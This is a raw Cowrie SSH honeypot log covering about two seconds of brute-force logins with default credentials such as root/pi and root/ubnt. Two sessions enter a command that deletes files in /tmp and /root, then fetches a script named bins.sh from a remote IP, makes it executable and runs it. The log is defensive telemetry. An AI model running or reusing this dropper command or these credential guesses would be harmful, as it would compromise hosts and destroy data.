{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.789345Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.806709Z","src_ip":"212.227.125.160","session":"526695486287"}
{"eventid":"cowrie.login.success","username":"root","password":"pi","message":"login attempt [root/pi] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.887914Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":51384,"dst_ip":"1.2.3.4","dst_port":22,"session":"f383a266fc01","protocol":"ssh","message":"New connection: 102.210.148.92:51384 (1.2.3.4:22) [session: f383a266fc01]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.966872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.967844Z","src_ip":"102.210.148.92","session":"f383a266fc01"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"pi","message":"login attempt [ubnt/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.034344Z","src_ip":"212.227.125.160","session":"4d4c58410947"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.048214Z","src_ip":"212.227.125.160","session":"6fdbf8eb092e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:39.076750Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.077433Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pi","message":"login attempt [admin/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.080458Z","src_ip":"212.227.125.160","session":"526695486287"}
{"eventid":"cowrie.login.failed","username":"student","password":"pi","message":"login attempt [student/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.083908Z","src_ip":"212.227.125.160","session":"dd9f9c99a42f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.094252Z","src_ip":"212.227.125.160","session":"b3df5e4df658"}
{"eventid":"cowrie.login.failed","username":"noc","password":"pi","message":"login attempt [noc/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.105904Z","src_ip":"212.227.125.160","session":"616030320564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.143837Z","src_ip":"102.210.148.92","session":"f383a266fc01"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.146481Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":515,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.190405Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.205819Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.login.success","username":"root","password":"ubnt","message":"login attempt [root/ubnt] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.288827Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.369107Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54966,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dc9d0025e66","protocol":"ssh","message":"New connection: 212.227.125.160:54966 (1.2.3.4:22) [session: 5dc9d0025e66]","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.441315Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:39.511638Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.512513Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.514068Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.514621Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.607331Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.608840Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54980,"dst_ip":"1.2.3.4","dst_port":22,"session":"0751ddb54a12","protocol":"ssh","message":"New connection: 212.227.125.160:54980 (1.2.3.4:22) [session: 0751ddb54a12]","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.649098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.717265Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.718070Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54954,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0191427ad90","protocol":"ssh","message":"New connection: 212.227.125.160:54954 (1.2.3.4:22) [session: a0191427ad90]","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.757957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.824641Z","src_ip":"212.227.125.160","session":"a0191427ad90"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.825789Z","src_ip":"212.227.125.160","session":"a0191427ad90"}
{"eventid":"cowrie.login.failed","username":"controll","password":"abcd1234","message":"login attempt [controll/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.887971Z","src_ip":"102.210.148.92","session":"f383a266fc01"}
{"eventid":"cowrie.login.success","username":"root","password":"ubnt","message":"login attempt [root/ubnt] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:39.941154Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.163211Z","src_ip":"212.227.125.160","session":"4d4c58410947"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.172441Z","src_ip":"212.227.125.160","session":"6fdbf8eb092e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:40.208482Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.209283Z","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.212616Z","src_ip":"212.227.125.160","session":"dd9f9c99a42f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54988,"dst_ip":"1.2.3.4","dst_port":22,"session":"41cfb9f79963","protocol":"ssh","message":"New connection: 212.227.125.160:54988 (1.2.3.4:22) [session: 41cfb9f79963]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.221639Z"}
{"eventid":"cowrie.login.success","username":"root","password":"ftpuser","message":"login attempt [root/ftpuser] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.222722Z","src_ip":"212.227.125.160","session":"0751ddb54a12"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.225529Z","src_ip":"212.227.125.160","session":"526695486287"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54994,"dst_ip":"1.2.3.4","dst_port":22,"session":"d69cdf6c6f9d","protocol":"ssh","message":"New connection: 212.227.125.160:54994 (1.2.3.4:22) [session: d69cdf6c6f9d]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.226240Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.227093Z","src_ip":"212.227.125.160","session":"616030320564"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.227961Z","src_ip":"212.227.125.160","session":"b3df5e4df658"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.271069Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"5dc9d0025e66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55002,"dst_ip":"1.2.3.4","dst_port":22,"session":"b81abb78a8e6","protocol":"ssh","message":"New connection: 212.227.125.160:55002 (1.2.3.4:22) [session: b81abb78a8e6]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.272835Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55000,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7355599d5c5","protocol":"ssh","message":"New connection: 212.227.125.160:55000 (1.2.3.4:22) [session: e7355599d5c5]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.273629Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55006,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2d0d6ba140","protocol":"ssh","message":"New connection: 212.227.125.160:55006 (1.2.3.4:22) [session: 9c2d0d6ba140]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.274719Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55016,"dst_ip":"1.2.3.4","dst_port":22,"session":"95bdf9331e8f","protocol":"ssh","message":"New connection: 212.227.125.160:55016 (1.2.3.4:22) [session: 95bdf9331e8f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.280875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.303286Z","src_ip":"212.227.125.160","session":"d69cdf6c6f9d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.304262Z","src_ip":"212.227.125.160","session":"d69cdf6c6f9d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.311747Z","src_ip":"212.227.125.160","session":"41cfb9f79963"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:40.312342Z","src_ip":"212.227.125.160","session":"41cfb9f79963"}
